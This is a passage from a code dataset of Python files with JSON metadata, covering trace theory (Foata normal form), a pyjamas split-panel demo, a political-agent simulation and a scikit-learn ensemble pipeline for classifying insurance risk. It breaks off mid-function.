ballPosY.text = \"Ball.pos.y: %1.f\" % ball.pos.y","sub_path":"Physics_Ex02.py","file_name":"Physics_Ex02.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"461112248","text":"import os\nimport settings\nimport graphviz\n\nos.environ[\"PATH\"] += os.pathsep + settings.graphviz_path\n\n\nclass Trace:\n __MARKER = chr(int('E000', base=16)) # private use area of unicode\n\n def __init__(self, alphabet, independence, word):\n # attributes\n self.alphabet = alphabet\n self.independence = independence\n self.word = word\n self.dependence = None\n self.foata_normal = None\n self.graph_edges = None\n self.graph_labels = None\n\n # input correctness check\n for letter in self.word:\n if letter not in self.alphabet:\n raise Exception(f'Letter {letter} of word not in alphabet.')\n\n for pair in self.independence:\n if (pair[1] + pair[0]) not in self.independence:\n raise Exception('Independence relation is not symmetric.')\n\n for letter in self.alphabet:\n if 2 * letter in self.independence: # an 'aa'-style pair would make the relation reflexive\n raise Exception('Independence relation is not anti-reflexive.')\n\n # compute other trace forms\n self.dependence = self.calculate_dependence()\n self.foata_normal = self.compute_Foata_Normal_Form()\n self.compute_dependency_graph()\n\n def calculate_dependence(self):\n dependence = set()\n for first in self.alphabet:\n for second in self.alphabet:\n pair = first + second\n if pair not in self.independence:\n dependence.add(pair)\n\n return dependence\n\n def trace_equiv_class(self):\n old = {self.word}\n new = {self.word} # the class always contains the word itself\n\n while True:\n for word in old:\n for i in range(len(word) - 1):\n if word[i:i + 2] in self.independence:\n new.add(\n word[:i] + word[i + 1] + word[i] + word[i + 2:])\n if old == new:\n break\n else:\n old = new.copy()\n\n return old\n\n # noinspection PyPep8Naming\n def compute_Foata_Normal_Form(self):\n \"\"\"\n There is a stack for every letter from the alphabet.\n\n Algorithm goes as follows:\n\n 0) Read the word in reversed order and for each letter\n put it on stack assigned to this letter and on every stack\n assigned to letters in dependency relation with currently\n processed letter put marker.\n\n 1) If all stacks are empty, then end.\n\n 2) Let S be the set of letters, which are at the top of stacks.\n For every letter that is in dependency relation with any\n 
letter from S, remove element from the top of the stack\n assigned to this letter. Go to step 1).\n\n \"\"\"\n stacks = {letter: list() for letter in self.alphabet}\n stacks_sizes = {letter: 0 for letter in self.alphabet}\n\n # Prepare all stacks corresponding to given letter.\n for letter in reversed(self.word):\n for other_letter in self.alphabet:\n pair = letter + other_letter\n if pair in self.dependence:\n stacks_sizes[other_letter] = stacks_sizes[other_letter] + 1\n if letter != other_letter:\n stacks[other_letter] += [self.__MARKER]\n else:\n stacks[letter] += [letter]\n\n normal_form = ''\n step = []\n\n while True:\n # Get letters from tops of stacks.\n for stack in stacks.values():\n if stack:\n if stack[-1] != self.__MARKER:\n step += [stack[-1]]\n\n # Remove dependent elements.\n for element in step:\n for letter in self.alphabet:\n pair = element + letter\n if pair in self.dependence:\n stacks[letter].pop()\n\n if step:\n normal_form += '(' + ''.join(sorted(step)) + ')'\n step = []\n else:\n break\n\n return normal_form\n\n def compute_dependency_graph(self):\n labels = []\n edges = []\n\n for i in range(len(self.word)):\n labels += [self.word[i]]\n for j in range(len(labels) - 1):\n pair = labels[j] + self.word[i]\n if pair in self.dependence:\n edges += [(j, i)]\n\n self.graph_edges = edges\n self.graph_labels = labels\n\n # delete redundant edges\n for v in range(len(labels)):\n self.__bfs_redundant_removal(v)\n\n def __bfs_redundant_removal(self, source):\n queue = [source]\n\n reachability_counter = [0] * len(self.graph_labels)\n\n while queue:\n node, queue = queue[0], queue[1:]\n\n for edge in self.graph_edges:\n if edge[0] == node:\n if reachability_counter[edge[1]] == 0:\n queue += [edge[1]]\n reachability_counter[edge[1]] += 1\n\n self.graph_edges = [edge for edge in self.graph_edges if not (\n edge[0] == source and reachability_counter[edge[1]] > 1\n )]\n\n def __topological_sort(self):\n nodes_list = []\n visited = [False] * len(self.graph_labels)\n\n for v in list(range(len(self.graph_labels))):\n if not visited[v]:\n self.__dfs(v, nodes_list, visited)\n\n return list(reversed(nodes_list))\n\n def __dfs(self, node, nodes_list, visited):\n visited[node] = True\n\n for edge in self.graph_edges:\n if edge[0] == node and not visited[edge[1]]:\n self.__dfs(edge[1], nodes_list, visited)\n\n nodes_list.append(node)\n\n def graph_to_foata(self):\n topological_nodes = self.__topological_sort()\n max_dist = [0] * len(topological_nodes)\n\n for v in topological_nodes:\n for edge in self.graph_edges:\n if edge[1] == v and max_dist[v] <= max_dist[edge[0]]:\n max_dist[v] = max_dist[edge[0]] + 1\n\n distances = set(max_dist)\n classes = ['' for _ in range(len(distances))]\n for dist in distances:\n class_elements = [self.graph_labels[i] for i in\n range(len(max_dist))\n if max_dist[i] == dist]\n classes[dist] = ''.join(sorted(class_elements))\n\n return ''.join(list(map(lambda x: '(' + x + ')', classes)))\n\n def save_graph_to_file(self, filename='graph_results/graph', file_format='jpeg'):\n \"\"\" Save graph to file in graphviz format and as an image\n\n :param filename: string containing a name of file to which the graph will be saved\n :param file_format: string with format information e.g. 
'png', 'svg', 'jpeg', ...\n :return:\n \"\"\"\n graph = graphviz.Digraph('G', filename=filename, format=file_format)\n for i, label in enumerate(self.graph_labels):\n graph.node(str(i), label=label)\n\n for edge in self.graph_edges:\n graph.edge(str(edge[0]), str(edge[1]))\n\n try:\n graph.render()\n except graphviz.ExecutableNotFound as e:\n print(\"Make sure you have Graphviz executables (not only python library) and that they are on systems' \"\n \"PATH.\\n\"\n \"If you have executables, the only thing to do is to put path to them into settings.py.\")\n print(\"Exception message:\")\n print(e)\n\n def __str__(self):\n return '[' + self.word + ']'\n\n def __repr__(self):\n return 'Trace(' + self.word + ')'\n","sub_path":"src/main/lab10/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"327599038","text":"from pyjamas.ui import RootPanel, HTML, Label, HasAlignment, Button\nfrom pyjamas import Window\n\nfrom pyjamas.vertsplitpanel import VerticalSplitPanel\n\nclass SplitPanel:\n\n def onModuleLoad(self):\n self.panel=VerticalSplitPanel()\n \n self.panel.setSize(\"500px\", \"350px\")\n self.panel.setSplitPosition(\"30%\")\n\n randomText = \"\"\n for i in range(200):\n randomText += \"hello \"\n\n self.panel.setTopWidget(HTML(randomText))\n self.panel.setBottomWidget(HTML(randomText))\n\n RootPanel().add(self.panel)\n","sub_path":"pyjamas-khtml/examples/splitpanel/SplitPanel.py","file_name":"SplitPanel.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442135536","text":"\"\"\"\nImmutable:\n Age: (0-100)\n Genders: Male, Female\n Sex Preference: Heterosexual, Homosexual\n\nMutable:\n Apathy: (0-10)\n Political Participating: True, False\n\n Education: Illiterate, Middleschool, Highschool, Higher Education\n Occupation: Blue Collar, White Collar, Academic, Unemployed\n Class: Working, Middle, Upper\n Married: True, False\n Parent: True, False\n Location: Urban, Rural, Suburban\n\n (TODO) Religion: Protestant, Catholic, Mormon, Jewish, Sunni, Shia, Hindu, Shinto, Neopagan, Buddhist, Other\n Religiosity: (0-10)\n\nIdeology:\n Socialism: (0-10)\n Libertarianism: (0-10)\n Conservatism: (0-10)\n Traditionalism: (0-10)\n Chauvinism: (0-10)\n\"\"\"\n\nfrom enum import Enum\nfrom random import randint\nfrom random import getrandbits\nimport numpy as np\n\nfrom Issue import *\nfrom Policy import *\n\nclass Gender(Enum):\n male = 0\n female = 1\n\nclass Sex_Preference(Enum):\n heterosexual = 0\n homosexual = 1\n\nclass Education(Enum):\n no_highschool = 0\n highschool = 1\n higher = 2\n\nclass Occupation(Enum):\n bluecollar = 0\n whitecollar = 1\n academic = 2\n unemployed = 3\n\nclass Political_Class(Enum):\n working = 0\n middle = 1\n upper = 2\n\nclass Location(Enum):\n urban = 0\n rural = 1\n\nclass Agent(object):\n\n def __init__(self):\n self.applied_policies = []\n\n self.traits = {}\n\n self.traits['alive'] = True\n self.traits['imprisoned'] = weighted_random([(99,0),(1,1)])\n\n self.traits['gov_opinion'] = np.random.beta(2,2)*20-10\n\n self.traits['age'] = ageRand()\n self.traits['gender'] = Gender(randint(0,1))\n self.traits['sex_preference'] = Sex_Preference(weighted_random([(96,0),(4,1)]))\n\n self.traits['apathy'] = int(abs(np.random.normal(4,2)))\n self.traits['participating'] = bool(getrandbits(1))\n\n self.traits['education'] = 
Education(weighted_random([(9,0),(57,1),(34,2)]))\n self.traits['occupation'] = Occupation(randint(0,3))\n self.traits['political_class'] = Political_Class(randint(0,2))\n self.traits['married'] = bool(getrandbits(1))\n self.traits['parent'] = bool(getrandbits(1))\n self.traits['location'] = Location(weighted_random([(81,0),(19,1)]))\n\n self.traits['radicalism'] = abs(np.random.normal(2,2))\n\n self.traits['conservatism-progressivism'] = np.random.beta(2,2)*20-10\n self.traits['capitalism-socialism'] = np.random.beta(2,2)*20-10\n self.traits['traditionalism-secularism'] = np.random.beta(2,2)*20-10\n self.traits['authoritarianism-libertarianism'] = np.random.beta(2,2)*20-10\n self.traits['chauvinism-humanism'] = np.random.beta(2,2)*20-10\n\n def setBase(self):\n self.traitsBase = dict(self.traits)\n\n def addIssue(self, issue):\n issue.apply(self.traits)\n\n def addPolicy(self, policy, option):\n policy.apply(self.traits, option)\n for effect in policy.options[option].effects:\n if effect[0](self.traits):\n self.applied_policies.append((policy.name, effect))\n\n def update(self):\n self.traits = dict(self.traitsBase) # copy, so the baseline itself is not mutated below\n for policy in self.applied_policies:\n for key, value in policy[1].items():\n self.traits[key] += value\n\n def printStats(self):\n for key, value in sorted(self.traits.items(), key=lambda tup: tup[0]):\n print(key + ': ' + str(\"%.2f\"%value))\n\n def printDif(self):\n for key, value in sorted(self.traits.items(), key=lambda tup: tup[0]):\n if not value is self.traitsBase[key]:\n print(key + ': ' + str(\"%.2f\"%self.traitsBase[key]) + ' -> ' + str(\"%.2f\"%value))\n\ndef weighted_random(pairs):\n # draw a value with probability proportional to its weight, e.g. [(96,0),(4,1)]\n total = sum(pair[0] for pair in pairs)\n r = randint(1, total)\n for (weight, value) in pairs:\n r -= weight\n if r <= 0: return value\n\ndef ageRand():\n # 2/3 chance of a uniform age in [0,50), 1/3 chance of a triangular age in [50,100]\n s1 = np.random.uniform(low=0,high=50,size=2)\n s2 = np.random.triangular(left=50,mode=50,right=100,size=1)\n return int(round(np.concatenate((s1, s2)).item(np.random.choice(3))))\n","sub_path":"Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"301329164","text":"# coding=utf-8\n\"\"\"The SKLearn module gathers all the ML algorithms that are needed\"\"\"\nfrom __future__ import print_function\nimport random\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", message=\"elementwise comparison failed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"Duplicate key in file\")\nwarnings.filterwarnings(\"ignore\", message=\"Variables are collinear\")\nwarnings.filterwarnings(\"ignore\", message=\"Precision and F-score are ill-defined\")\n\nimport re\nfrom sklearn.metrics import confusion_matrix as conf_matr\nfrom sklearn.metrics import accuracy_score\nfrom imblearn.over_sampling import RandomOverSampler, ADASYN, SMOTE\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import preprocessing\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\nfrom subprocess import call\nimport os\nfrom sklearn import tree as tr\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport os.path\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom 
sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.cluster import KMeans\nnp.set_printoptions(threshold=np.inf) # np.nan is not a valid threshold in recent NumPy\nimport time\n\n\ndef LabelEncoder(dataset, target, header, risk_level, dataset_name, force_encoding=False):\n \"\"\"\nLabelEncoder label-encodes the given dataset and target\n :param dataset: the dataset to label-encode\n :param target: the target to label-encode\n :param header: header of the CSV file\n :param risk_level: the risk level being classified\n :param dataset_name: name of the dataset\n :param force_encoding: if True, re-encode from scratch, ignoring the encodings previously cached in the labels folder\n :return dataset: the label-encoded dataset\n :return target: the label-encoded target\n :return labels: a dictionary [index, label] describing the encoding\n :return target_classes: all the class labels of the target\n \"\"\"\n\n index_dict = 0\n labels = dict()\n\n\n column_index = 0\n # Create the folder and files where the encoding is cached.\n # The cache speeds up later encoding runs.\n directory = './labels/'\n filename_enc = directory + \"encoding_\" + risk_level + \"_\" + os.path.basename(dataset_name).split(\".csv\")[\n 0] + \"_\" + str(len(dataset)) + \".npy\"\n filename_dataset = directory + \"enc_data_\" + risk_level + \"_\" + os.path.basename(dataset_name).split(\".csv\")[\n 0] + \"_\" + str(len(dataset)) + \".npy\"\n if os.path.exists(directory) == False:\n os.mkdir(directory)\n total_column = float(len(dataset[0]))\n\n # Find the column indices of the dates to convert from the CSV format to yyyy/mm/dd.\n # That format sorts correctly.\n\n date_i_1 = -1\n date_i_2 = -1\n date_i_3 = -1\n date_i_4 = -1\n for i in range(0, len(header)):\n if header[i] == 'DINZI_VLDT_GRZI':\n date_i_1 = i\n if header[i] == 'DFINE_VLDT_GRZI':\n date_i_2 = i\n if header[i] == 'data_prima_immatricolazione':\n date_i_3 = i\n if header[i] == 'data_ultima_voltura':\n date_i_4 = i\n\n # If the cache files are missing, or force_encoding is set, run the encoding.\n if os.path.exists(filename_enc) == False or os.path.exists(filename_dataset) == False or force_encoding == True:\n # Process the data column by column\n for column in dataset.T:\n column_labels = dict()\n print(\"\\rEncoding: \" + str(int((column_index / total_column) * 100)) + \"%\", end=\"\")\n # Collect the distinct values of the column in tmp_labels so each can be mapped to a number\n tmp_labels = []\n for row in column:\n if column_index == date_i_1 or column_index == date_i_2 or column_index == date_i_3 or column_index == date_i_4:\n row = to_num_date(row)\n if tmp_labels.__contains__(row) == False:\n tmp_labels.append(row)\n 
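# Illustrative run for one column: values [\"B\", \"A\", \"B\"] produce the mapping\n # {0: \"A\", 1: \"B\"} and the column is rewritten as [1, 0, 1]; index_dict keeps\n # growing across columns, so the next column continues from key 2.\n 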
# Sort the values. The ordering matters for algorithms such as decision trees,\n # whose splits are criteria of the form <= and >\n tmp_labels = sorted(tmp_labels)\n # Assign a number to every label\n for row in tmp_labels:\n column_labels[index_dict] = row\n labels[index_dict] = row\n index_dict = index_dict + 1\n # Convert the dataset\n for i in range(0, len(dataset)):\n if column_index == date_i_1 or column_index == date_i_2 or column_index == date_i_3 or column_index == date_i_4:\n label = to_num_date(dataset[i, column_index])\n else:\n label = dataset[i, column_index]\n dataset[i, column_index] = get_key(column_labels, label)\n column_index = column_index + 1\n print(\"\\rEncoding: 100 %\")\n # Cache the encoding\n dataset = np.array(dataset).astype(int)\n np.save(filename_enc, labels)\n np.save(filename_dataset, dataset)\n else:\n labels = np.load(filename_enc).item()\n dataset = np.load(filename_dataset)\n\n # Label-encode the target.\n # Here sklearn's LabelEncoder can be used directly because ordering does not matter.\n target_encoder = preprocessing.LabelEncoder()\n target_encoder.fit(target)\n target = target_encoder.transform(target)\n print(\"\\rEncoding: 100%\", end=\"\")\n print(\"\\nDone!\")\n return dataset, np.array(target).astype(int), labels, target_encoder.classes_\n\n\ndef cross_validation(dataset, target, dataset_name, n_fold=2, labels=None,\n risk_level=None, percentage=-1, n_cluster=5, cluster_both_class=True):\n \"\"\"\ncross_validation runs stratified cross validation on the given dataset.\nIt combines 7 internal algorithms in order to boost performance.\nBy default it uses the best known configuration for each risk level, but other configurations can be used as well.\n :param dataset: dataset to use for the cross validation\n :param target: vector holding the class label of every entry\n :param dataset_name: name of the dataset in use\n :param n_fold: number of folds used by the cross validation\n :param labels: class labels of the target\n :param risk_level: risk level being classified\n :param percentage: fraction of repeated oversampled entries relative to the initial dataset size. By default oversampling balances all classes to the same number of entries.\n \"\"\"\n 
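# Hypothetical call (argument values are only an example):\n # cross_validation(dataset, target, \"dataset_2016_NNC.csv\", n_fold=5,\n # labels=['ClassA', 'ClassB'], risk_level='NNC', percentage=20, n_cluster=5)\n 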
random_state = 94\n year = dataset_name[len(dataset_name) - 35:len(dataset_name) - 31]\n filename_statistics = \"./statistics_\" + year + \"/statistics_\" + year + \"_\" + risk_level + \".txt\"\n\n # If the risk level is cost_caused_claim, turn the problem into a binary one (cost_caused_claim has 4 distinct targets by default)\n if risk_level == 'cost_caused_claim':\n targetA_012_B_3 = []\n for i in range(0, len(target)):\n if target[i] != 3:\n targetA_012_B_3.append(0)\n else:\n targetA_012_B_3.append(1)\n labels = ['ClassA (range1,2,3)', 'ClassB (range 4)']\n target = np.array(targetA_012_B_3).astype(int)\n\n # Fetch the models (and their names) ordered by the given criterion (r,p,f,m)\n models, clfs_name, baggings, max_features, max_samples = get_clf_ordered(risk_level, \"r\")\n\n print(\"\\n##### CROSS VALIDATION RUN ########\")\n if percentage == -1:\n print(\"Run oversampling without percentage\\n\")\n else:\n print(\"Run oversampling with percentage for the less populous class: \" + str(percentage) + \"%\")\n print(\"Number of cluster: \" + str(n_cluster)+\"\\n\")\n start = time.time()\n\n # Initialise the containers that will hold the results\n y_test_tot = dict()\n predicted_tot = dict()\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n for n_right in range(2, n_of_clf + 1):\n y_test_tot[index_dict] = np.array([])\n predicted_tot[index_dict] = np.array([])\n index_dict = index_dict + 1\n\n # Normalise the dataset in order to run KMeans\n\n\n if cluster_both_class == True:\n dataset_discretized = preprocessing.normalize(dataset, norm='l2')\n cl = KMeans(n_clusters=n_cluster).fit(dataset_discretized)\n clusters = cl.labels_\n else:\n dataset_B =[]\n target_B = []\n\n for i_t, t in enumerate(target):\n if t==1:\n dataset_B.append(dataset[i_t])\n target_B.append(t)\n\n\n dataset_discretized_B = preprocessing.normalize(dataset_B, norm='l2')\n cl = KMeans(n_clusters=n_cluster).fit(dataset_discretized_B)\n clusters_B = cl.labels_\n\n clusters = []\n find_c = 0\n for t in target:\n if t == 0:\n clusters.append(-1)\n else:\n clusters.append(clusters_B[find_c])\n find_c = find_c+1\n clusters = np.array(clusters).astype(int)\n\n # Use StratifiedKFold to build the folds\n kf = StratifiedKFold(n_splits=n_fold, random_state=random_state, shuffle=False).split(dataset, target)\n k = 1\n for train_index, test_index in kf:\n print(\"####### Fold \" + str(k) + \"/\" + str(n_fold) + \" #######\")\n\n # Split training set and test set\n X_train, X_test = dataset[train_index], dataset[test_index]\n y_train, y_test = target[train_index], target[test_index]\n # Keep only the cluster labels of interest (the ones belonging to the training rows)\n clusters_train = clusters[train_index]\n\n # Apply the oversampling.\n # By default the oversampling produces a training set with an equal number of entries per class.\n if percentage == -1:\n X_train, y_train = ADASYN().fit_sample(X_train, y_train)\n else:\n # Setting the percentage parameter instead makes the minority class as large as that\n # percentage of the initial dataset. In both cases the rows to duplicate are picked at random.\n\n # How is a random percentage of rows taken?\n # First count the rows of the minority class\n count_in_train = 0\n 
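# Illustrative numbers: with percentage=20 and 1000 training rows, the minority\n # class is topped up to about 200 rows; if 150 such rows already exist, cB_tot\n # (computed below) comes out at 50.\n 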
for i in range(0, len(y_train)):\n if y_train[i] == 1:\n count_in_train = count_in_train + 1\n\n # Compute cB_tot, the number of extra rows needed to reach the requested oversampling percentage\n cB_perc = float(percentage)\n tot = float(len(y_train))\n cB_tot = int((cB_perc / 100.0) * tot) - count_in_train\n\n # cB_tot is the number of rows still wanted\n\n # Count how many rows exist for each clustering label\n counter_cluster_train = []\n for i_c in range(0, n_cluster, 1):\n counter_cluster_train.append(0)\n # i.e. measure how the population is distributed over the clusters\n for i_t, cluster_target in enumerate(clusters_train):\n if y_train[i_t] == 1:\n counter_cluster_train[cluster_target] = counter_cluster_train[cluster_target] + 1\n\n # Rows to add per cluster so the total matches the requested percentage\n cB_tot_x_cluster = int(cB_tot / float(n_cluster))\n\n # Compute how many rows must be added for each cluster label of target 1\n to_add_cluster_counter = []\n for i_c in range(0, n_cluster, 1):\n to_append = 0\n if cB_tot_x_cluster - counter_cluster_train[i_c] > 0:\n to_append = cB_tot_x_cluster - counter_cluster_train[i_c]\n to_add_cluster_counter.append(to_append)\n\n # Add the rows\n for i_c, cB_tot_cluster in enumerate(to_add_cluster_counter):\n r_index_B = []\n cB_tot_cluster_added = 0\n # Draw rows until cB_tot_cluster, the desired number of extra rows, is reached\n while cB_tot_cluster_added < cB_tot_cluster:\n random_index = random.randint(0, len(clusters_train) - 1)\n # Only take indices with this cluster label and target 1; there is obviously no point oversampling target 0\n if clusters_train[random_index] == i_c and y_train[random_index] == 1:\n r_index_B.append(random_index)\n cB_tot_cluster_added = cB_tot_cluster_added + 1\n\n\n # Append these rows to the training set\n X_train = np.array(list(X_train) + list(X_train[r_index_B])).astype(int)\n y_train = np.array(list(y_train) + list(y_train[r_index_B])).astype(int)\n\n k = k + 1\n clfs_already_trained = []\n progress_clf = 0\n # Train the individual classifiers\n for model, name, bagging, max_feature, max_sample in zip(models, clfs_name, baggings, max_features, max_samples):\n print(\"\\rTraining progress: \" + str(int((float(progress_clf) / float(len(clfs_name))) * 100)) + \"%\", end=\"\")\n # Apply the bagging operator\n if bagging==True:\n clf = BaggingClassifier(model, n_estimators=7, max_samples=max_sample, max_features=max_feature, random_state=random_state)\n else:\n clf = model\n # Keep the fitted classifier in clfs_already_trained.\n # That list is used later in the testing phase.\n clfs_already_trained.append(clf.fit(X_train, y_train))\n progress_clf = progress_clf + 1\n print(\"\\rTraining progress: \" + str(int((float(progress_clf) / float(len(clfs_name))) * 100)) + \"%\", end=\"\")\n print(\"\\n\")\n all_predicted_clf = []\n for clf in clfs_already_trained:\n all_predicted_clf.append(clf.predict(X_test))\n\n # Predict on the test set for every possible combination of n_right and n_of_clf;\n # the predictions are saved to the statistics file so they can be inspected\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n predicted_clf = all_predicted_clf[:n_of_clf]\n for n_right in range(2, n_of_clf + 1):\n predicted = []\n for i in range(0, len(predicted_clf[0])):\n counter_right = 0\n 
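# Majority-vote example: with n_of_clf=4 and n_right=3, a test row is labelled 1\n # only when at least 3 of the first 4 classifiers predict 1.\n 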
for j in range(0, n_of_clf):\n if predicted_clf[j][i] == 1:\n counter_right = counter_right + 1\n if (counter_right >= n_right):\n predicted.append(1)\n else:\n predicted.append(0)\n y_test_tot[index_dict] = np.append(y_test_tot[index_dict], y_test)\n predicted_tot[index_dict] = np.append(predicted_tot[index_dict], predicted)\n index_dict = index_dict + 1\n\n # Write all the statistics to a file\n end = time.time()\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n for n_right in range(2, n_of_clf + 1):\n y_test_tot_iter = y_test_tot[index_dict].astype(int)\n predicted_tot_iter = predicted_tot[index_dict].astype(int)\n\n with open(filename_statistics, \"a\") as myfile:\n myfile.write(\"####### CROSS VALIDATION START #######\\n\\n\")\n myfile.write(\"############ INFORMATIONS ############\\n\")\n myfile.write(\"Cross validation fold: \" + str(n_fold) + \"\\n\")\n if percentage == -1:\n myfile.write(\"Run oversampling without percentage\\n\")\n else:\n myfile.write(\n \"Run oversampling with percentage for the less populous class: \" + str(percentage) + \"%\\n\")\n\n myfile.write(\n \"Number of equal prediction between classification for less populous class: \" + str(n_right) + \"\\n\")\n myfile.write(\"Number of classifier used: \" + str(n_of_clf) + \"\\n\")\n myfile.write(\"Number of cluster: \" + str(n_cluster) + \"\\n\")\n if cluster_both_class == True:\n myfile.write(\"Classes used for clustering: \" + str(\"A, B\") + \"\\n\")\n else:\n myfile.write(\"Classes used for clustering: \" + str(\"A\") + \"\\n\")\n myfile.write(\"######################################\\n\")\n myfile.write(\"\\nElapsed times for cross validation: \" + timer(start, end) + \"\\n\")\n acc = accuracy_score(y_test_tot_iter, predicted_tot_iter, normalize=True, sample_weight=None)\n myfile.write(\"Accuracy on the prediction: \")\n print(\"%.2f\" % acc, file=myfile)\n print(\"\", file=myfile)\n myfile.write(\"Confusion Matrix\\n\")\n cm = conf_matr(y_test_tot_iter, predicted_tot_iter)\n print(pd.DataFrame(cm, index=labels, columns=labels), file=myfile)\n myfile.write(\"\\n\")\n print(classification_report(y_test_tot_iter, predicted_tot_iter, target_names=labels), file=myfile)\n myfile.write(\"\\n\\n\")\n myfile.close()\n index_dict = index_dict + 1\n\n\ndef timer(start, end):\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n return \"{:0>2}:{:0>2}:{:05.2f}\".format(int(hours), int(minutes), seconds)\n\n\ndef get_key(labels, label):\n for key, value in labels.items():\n if value == label:\n return key\n\n\ndef tree_as_pdf(dataset, target, features, path, labels):\n \"\"\"\nRenders the decision tree as a pdf and saves it to the given path\n :param dataset: dataset to train on\n :param target: target to train on\n :param features: attributes the decision tree is based on\n :param path: where to save the file\n \"\"\"\n\n if os.path.isdir(\"./dtree\") == False:\n os.mkdir(\"./dtree\")\n path = \"./dtree/\" + path\n\n print(\"Save the decision tree as pdf file into \" + path)\n tree = DecisionTreeClassifier(max_depth=5).fit(dataset, target)\n tr.export_graphviz(tree,\n out_file='temp.dot', feature_names=features)\n\n # Convert the numbers in the .dot file back to the proper labels\n with open('./temp.dot', \"r\") as f:\n lines = f.readlines()\n f.close()\n with open('./temp.dot', \"w\") as f:\n for line in lines:\n split_gini = line.split(r\"\\ngini\")\n if len(split_gini) > 1:\n number_gini = split_gini[0].split(\" \")\n label = 
labels[int(float(number_gini[3]))]\n line = line.replace(number_gini[3], label)\n f.write(line + \"\\n\")\n f.close()\n\n call(['dot', '-Tpdf', 'temp.dot', '-o', path])\n print(\"Done!\")\n os.remove('temp.dot')\n\n\ndef to_num_date(date):\n # input format: 01JAN1990\n pattern = re.compile(r\"^\\d{2}[A-Z]{3}\\d{4}$\") # the old class-range pattern only matched such dates by accident\n if pattern.match(date) is None:\n return date\n months = dict()\n months['JAN'] = 1\n months['FEB'] = 2\n months['MAR'] = 3\n months['APR'] = 4\n months['MAY'] = 5\n months['JUN'] = 6\n months['JUL'] = 7\n months['AUG'] = 8\n months['SEP'] = 9\n months['OCT'] = 10\n months['NOV'] = 11\n months['DEC'] = 12\n month_str = str(date[2:5])\n day_str = date.split(month_str)\n day = day_str[0]\n year = day_str[1]\n conv_date = str(year + \"/\" + str(months[month_str]).zfill(2) + \"/\" + day)\n return conv_date\n\n\ndef get_clf_ordered(risk_level, order):\n \"\"\"\n Given a risk level, returns the best known configuration based on recall\n :param risk_level: risk level of interest\n \"\"\"\n\n ######## n_caused_claim ########\n classifiers_n_caused_claim = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n AdaBoostClassifier(),\n DecisionTreeClassifier(max_depth=5),\n ]\n\n names_n_caused_claim = [\n \"QDA\",\n \"Naive Bayes\",\n \"AdaBoost\",\n \"Decision Tree\",\n ]\n\n bagging_n_caused_claim = [\n True,\n True,\n True,\n True,\n ]\n\n # Ordered by recall\n max_features_n_caused_claim = [\n 0.55,\n 0.775,\n 1.0,\n 1.0,\n ]\n\n max_samples_n_caused_claim = [\n 0.325,\n 0.55,\n 0.325,\n 0.1,\n ]\n ######################\n\n ######## NNC ########\n classifiers_NNC = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n AdaBoostClassifier(),\n DecisionTreeClassifier(max_depth=5),\n ]\n\n names_NNC = [\n \"QDA\",\n \"Naive Bayes\",\n \"AdaBoost\",\n \"Decision Tree\",\n ]\n\n bagging_NNC = [\n True,\n True,\n True,\n True,\n ]\n\n # Ordered by recall\n max_features_NNC = [\n 0.55,\n 0.325,\n 1.0,\n 1.0,\n ]\n\n max_samples_NNC = [\n 1.0,\n 0.55,\n 1.0,\n 0.325,\n ]\n\n ######################\n\n ######## NCD ########\n classifiers_NCD = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n DecisionTreeClassifier(max_depth=5),\n AdaBoostClassifier(),\n ]\n\n names_NCD = [\n \"QDA\",\n \"Naive Bayes\",\n \"Decision Tree\",\n \"AdaBoost\",\n ]\n\n bagging_NCD = [\n True,\n True,\n True,\n True,\n ]\n\n # Ordered by recall\n max_features_NCD = [\n 0.55,\n 0.325,\n 1.0,\n 1.0,\n ]\n\n max_samples_NCD = [\n 0.325,\n 0.325,\n 0.1,\n 1.0,\n ]\n\n ######################\n\n ######## cost_caused_claim ########\n classifiers_cost_caused_claim = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n DecisionTreeClassifier(max_depth=5),\n AdaBoostClassifier(),\n ]\n\n names_cost_caused_claim = [\n \"QDA\",\n \"Naive Bayes\",\n \"Decision Tree\",\n \"AdaBoost\",\n ]\n\n bagging_cost_caused_claim = [\n True,\n True,\n False,\n True,\n ]\n\n # Ordered by recall\n max_features_cost_caused_claim = [\n 0.55,\n 0.325,\n 0.0,\n 1.0,\n ]\n\n max_samples_cost_caused_claim = [\n 0.775,\n 0.55,\n 0.0,\n 1.0,\n ]\n\n ######################\n\n\n if risk_level == 'cost_caused_claim':\n return classifiers_cost_caused_claim, names_cost_caused_claim, bagging_cost_caused_claim, max_features_cost_caused_claim, max_samples_cost_caused_claim\n if risk_level == 'n_caused_claim':\n return classifiers_n_caused_claim, names_n_caused_claim, bagging_n_caused_claim, max_features_n_caused_claim, max_samples_n_caused_claim\n if risk_level == 'NCD':\n 